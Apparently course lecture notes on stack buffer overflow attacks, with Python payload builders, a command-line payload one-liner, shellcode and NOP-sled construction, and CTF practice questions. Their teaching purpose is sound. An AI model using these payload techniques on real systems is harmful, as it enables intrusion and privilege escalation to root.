Control-Flow Hijacking

A program's control flow is the order in which its instructions execute. Control-flow hijacking is an attack that bends that order to the attacker's will — making the program run code it was never supposed to run. The classic way in is a stack buffer overflow: the program copies attacker-controlled input into a fixed-size stack buffer without checking its length, and the overflow clobbers the control data sitting next to that buffer.

This is not a museum piece. "Out-of-bounds Write" (CWE-787) was #1 on the 2023 CWE Top 25, and the technique dates to the Morris worm (1988) and the canonical 1996 write-up "Smashing the Stack for Fun and Profit." Memory-unsafe C/C++ keeps it alive.

Background: the run-time stack

To see why an overflow is dangerous, you need to know what lives next to a buffer. On x86 the stack grows downward (toward lower addresses). Each function call builds a stack frame. In 32-bit conventions the frame, relative to the frame-base pointer %ebp, looks like this:

Address      Contents
%ebp + 8     first argument passed in by the caller
%ebp + 4     saved return address (where ret jumps back to)
%ebp + 0     saved %ebp of the caller
%ebp - …     local variables and buffers (negative offsets)

Key registers: %esp points at the top of the stack, %ebp anchors the current frame, and %eip (the instruction pointer) holds the address of the next instruction to execute. The typical function prolog sets this up:

push %ebp          # save caller's frame base
mov  %esp, %ebp    # establish new frame base
sub  $0x24, %esp   # reserve space for locals

The crucial fact: local buffers sit at lower addresses than the saved return address. Because a C string copy writes upward from the start of the buffer, an over-long write marches straight toward — and over — the saved %ebp and the return address.

The vulnerability

#include <string.h>       // declares strcpy

#define SIZE 16
int vul(char *input) {
    char buf[SIZE];
    strcpy(buf, input);   // no bounds check!
    return 0;
}

strcpy copies bytes until it reaches a NUL terminator, and it has no idea how big buf is. If input holds 16 or more characters, the copy (including the terminating NUL) runs past the end of buf and overwrites whatever sits at higher addresses on the stack. Functions like gets, sprintf, and scanf with an unbounded %s share this flaw.
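The effect of the unchecked copy can be illustrated with a toy model. The sketch below is a Python simulation, not real process memory. It assumes an idealized frame in which buf is followed directly by the saved %ebp, the return address, and 8 bytes of caller data, with no padding and no stack canary; real compilers often lay frames out differently. The helper names (new_frame, model_strcpy, read_frame) and the sample addresses are invented for illustration.

```python
import struct

SIZE = 16  # same buffer size as in vul()

def new_frame(saved_ebp=0xFFFFD0C8, ret_addr=0x08049250):
    """Idealized frame: [buf 16][saved ebp 4][return address 4][caller data 8].
    Both default addresses are made-up example values."""
    return bytearray(SIZE) + bytearray(struct.pack("<II", saved_ebp, ret_addr)) + bytearray(8)

def model_strcpy(frame, data):
    """Mimic strcpy(buf, input): copy up to the first NUL, then write the
    terminating NUL, never checking SIZE."""
    end = data.find(b"\x00")
    src = (data if end < 0 else data[:end]) + b"\x00"
    for i, byte in enumerate(src):
        frame[i] = byte  # buf starts at offset 0 of the modeled frame

def read_frame(frame):
    """Return (buf, saved_ebp, ret_addr) as they look after the copy."""
    saved_ebp, ret_addr = struct.unpack_from("<II", frame, SIZE)
    return bytes(frame[:SIZE]), saved_ebp, ret_addr

# 15 characters plus the NUL fit exactly: the control data is untouched.
safe = new_frame()
model_strcpy(safe, b"A" * 15)
print("safe:   ", [hex(v) for v in read_frame(safe)[1:]])

# 24 characters run past buf and replace both saved values.
smashed = new_frame()
model_strcpy(smashed, b"A" * 20 + b"BBBB")
print("smashed:", [hex(v) for v in read_frame(smashed)[1:]])
```

In this model a 16-character input is already enough to do damage: the terminating NUL lands on the lowest byte of the saved %ebp.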

Escalating the attack

The lecture builds the attack in three levels of increasing power.

Level 1 — Overwrite an adjacent variable. Suppose a local int flag sits just above buf. Overflowing buf lets you flip flag from 0 to nonzero and pass a check you weren't supposed to pass. You've changed data, not yet control flow.

Level 2 — Overwrite a function pointer. Now the function holds void (*fp)() = dummy; and later calls fp(). Overflow buf to overwrite fp with the address of a target() function (say one that calls execve("/bin/sh", …)). When the program does fp(), it jumps to your chosen target. This is genuine control-flow hijacking via an indirect call.

Level 3 — Overwrite the return address. What if there's no convenient function pointer? Every function still has one piece of control data on the stack: the saved return address. Overflow past buf, past the saved %ebp, and write your target address into the return-address slot (%ebp + 4). When the function executes ret, it pops that slot into %eip — and execution continues wherever you pointed it.

[ buffer      ][ saved ebp ][ return address ][ args ]
  AAAA...AAAA    AAAA         <target addr>

If target() runs execve("/bin/sh", …), you get a shell. And if the vulnerable program is Set-UID root, that shell inherits root's privileges — a textbook privilege escalation (exactly the goal of the course CTF).

Endianness matters. x86 is little-endian, so an address 0x080491a6 is written in the payload as the bytes \xa6\x91\x04\x08.
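Rather than reversing the bytes by hand, the address can be packed programmatically. The following is a minimal sketch using Python's standard struct module. The helper names pack_addr and build_payload are invented here, and the offset of 20 (16 bytes of buf plus 4 bytes of saved %ebp) assumes the idealized layout drawn above; for a real binary the offset has to be measured.

```python
import struct

def pack_addr(addr):
    """Pack a 32-bit address in little-endian order, the way x86 stores it."""
    return struct.pack("<I", addr)

def build_payload(offset, target, fill=b"A"):
    """Padding up to the return-address slot, followed by the packed target.
    `offset` is the distance from the start of the buffer to that slot."""
    return fill * offset + pack_addr(target)

TARGET = 0x080491A6   # example address from the text
OFFSET = 20           # assumption: idealized frame, no padding

payload = build_payload(OFFSET, TARGET)
print(pack_addr(TARGET))
print(len(payload), payload[-4:].hex())
```

Keeping the address as an integer and packing it at the last moment avoids the most common slip in hand-written payloads, which is writing the bytes in the order they are read rather than the order they are stored.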

Finding the return address (the offset)

To overwrite the return address you must know how many bytes of padding come before it. Three methods:

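  1. Read the assembly: disassemble the function and find the buffer's offset from %ebp, for example in the lea instruction that computes the buffer's address before the call to strcpy. The sub $0x..,%esp in the prolog shows only the total space reserved for locals. The return-address slot sits 4 bytes above %ebp, so the padding length is the buffer's distance below %ebp plus 4.
  2. Inspect the stack in GDB/pwndbg: set a breakpoint, examine memory, find where the buffer ends and the return slot begins.
  3. Use a cyclic pattern (pwntools): cyclic 100 emits a De Bruijn sequence in which every 4-byte window is unique. Feed it as input; the program crashes with one of those unique 4-byte windows in %eip (e.g. *EIP 0x61616174 ('taaa')). Then cyclic -l taaa reports the index of that substring, which is exactly the offset from the start of the buffer to the return address.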
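To show why the cyclic-pattern lookup works, here is a standalone pure-Python sketch of the idea. It is not the pwntools implementation: the functions cyclic and cyclic_find are named after the pwntools helpers but written from scratch, and the lowercase alphabet and 4-byte window are assumptions chosen to match the example above.

```python
from itertools import islice
import string

def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence: every length-n window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def cyclic(length, n=4):
    """First `length` characters of the pattern."""
    return "".join(islice(de_bruijn(string.ascii_lowercase, n), length))

def cyclic_find(window, length=1000, n=4):
    """Index of `window` in the pattern, or -1 if it is not in the prefix."""
    return cyclic(length, n).find(window)

pattern = cyclic(100)
print(pattern[:24])
print(cyclic_find("taaa"))   # the window that ended up in %eip
```

Because no 4-byte window repeats, the four bytes found in %eip identify a single position in the input, and that position is the number of padding bytes needed before the return address.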

A handy way to deliver a raw binary payload on the command line:

./prog $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*32 + b'\xa6\x91\x04\x08')")

Code injection: shellcode

Levels 2 and 3 reused code already in the program. But what if there's no target() to jump to? Then the attacker injects their own machine code ("shellcode") into the buffer and points the return address at it.

Shellcode usually invokes a system call directly — the interface user programs use to ask the kernel for services. On 32-bit Linux you trigger one with int $0x80 (64-bit uses the syscall instruction). The convention for int $0x80 is:

%eax             %ebx     %ecx     %edx
syscall number   arg 1    arg 2    arg 3

To spawn a shell with execve("/bin/sh", NULL, NULL) you set %eax = 0x0b (sys_execve), point %ebx at the "/bin/sh" string (built on the stack), zero %ecx/%edx, and execute int $0x80.

Two practical obstacles

No NUL bytes. Because strcpy (and friends) stop at the first \x00, the shellcode must contain no zero bytes or the copy truncates mid-payload. So attackers swap instructions for zero-free equivalents that do the same thing. For example, mov $0, %eax encodes its immediate as four zero bytes, while xor %eax, %eax clears the register with none.
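The zero-byte constraint is easy to check mechanically. The sketch below compares two ways of putting 0x0b into %eax, using their standard 32-bit x86 encodings, and shows how much of each would survive a strcpy. The helper name survives_strcpy is invented for this illustration.

```python
def survives_strcpy(code):
    """Bytes that strcpy would actually copy: everything before the first NUL."""
    i = code.find(b"\x00")
    return code if i < 0 else code[:i]

# mov $0xb, %eax : opcode b8 plus a 4-byte immediate, three of them zero
MOV_EAX_IMM32 = bytes.fromhex("b80b000000")

# xor %eax, %eax ; mov $0xb, %al : same value in %eax, no zero bytes
XOR_THEN_MOV_AL = bytes.fromhex("31c0b00b")

for name, code in [("mov imm32", MOV_EAX_IMM32), ("xor + mov al", XOR_THEN_MOV_AL)]:
    kept = survives_strcpy(code)
    print(f"{name:12} {code.hex():12} copied: {len(kept)}/{len(code)} bytes")
```

The same check can be run over a whole payload before delivering it, including the packed return address, which is also subject to the copy stopping at a zero byte.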

Not knowing the exact landing address. Stack addresses can shift, so guessing the precise shellcode address is fragile. The fix is a NOP sled: prepend many nop (no-op) instructions, then the shellcode, then the return address. As long as %eip lands anywhere in the sled, execution slides down the NOPs into the shellcode:

[ nop nop nop … nop ][ shellcode ][ … ][ return address → somewhere in the sled ]
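The layout above can be assembled with a few lines of Python. This is a sketch under stated assumptions: build_sled_payload is a hypothetical helper, the buffer address 0xFFFFD010 and the offset of 112 are made-up example values, and the "shellcode" is a 24-byte placeholder of int3 (0xcc) bytes rather than working code.

```python
import struct

NOP = b"\x90"  # single-byte x86 nop

def build_sled_payload(buf_addr, offset, shellcode, gap=0):
    """Lay out [nop sled][shellcode][gap filler][return address].
    buf_addr: guessed address of the start of the buffer
    offset:   bytes from the buffer start to the return-address slot
    Returns (payload, landing) where landing is the address written
    into the return slot."""
    sled_len = offset - len(shellcode) - gap
    if sled_len <= 0:
        raise ValueError("shellcode does not fit before the return address")
    landing = buf_addr + sled_len // 2          # aim at the middle of the sled
    payload = NOP * sled_len + shellcode + b"A" * gap + struct.pack("<I", landing)
    return payload, landing

PLACEHOLDER = b"\xcc" * 24                       # stand-in, not real shellcode
payload, landing = build_sled_payload(0xFFFFD010, 112, PLACEHOLDER)
print(len(payload), hex(landing))
```

Aiming at the middle of the sled means the guessed buffer address can be wrong by roughly half the sled length in either direction and the return still lands on a nop. A longer sled buys more tolerance, but only as far as the space before the return address allows.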

Key takeaways

Practice

  1. Which direction does the x86 run-time stack grow as new frames are pushed?
  2. In a typical 32-bit stack frame, what is stored at %ebp + 4?
  3. Why is strcpy(buf, input) dangerous when buf is a fixed-size stack array?
  4. An attacker overflows a local buffer and overwrites the saved return address with the address of target(). What happens when the vulnerable function executes ret?
  5. In 32-bit Linux shellcode that invokes a system call with int $0x80, which register holds the system-call number?
  6. Why must execve shellcode delivered through strcpy() contain no NUL (\x00) bytes?
  7. What problem does a NOP sled (nop nop … [shellcode] … [ret addr]) solve in a stack overflow exploit?
  8. The 2023 CWE Top 25 ranks which weakness #1 — the class that classic stack buffer overflows belong to?
  9. Using pwntools, explain how cyclic together with cyclic -l lets you find the exact offset from the start of the buffer to the saved return address.
  10. The CTF binaries are Set-UID root programs with a stack buffer overflow. Explain why hijacking control flow to run execve("/bin/sh", …) gives you a root shell.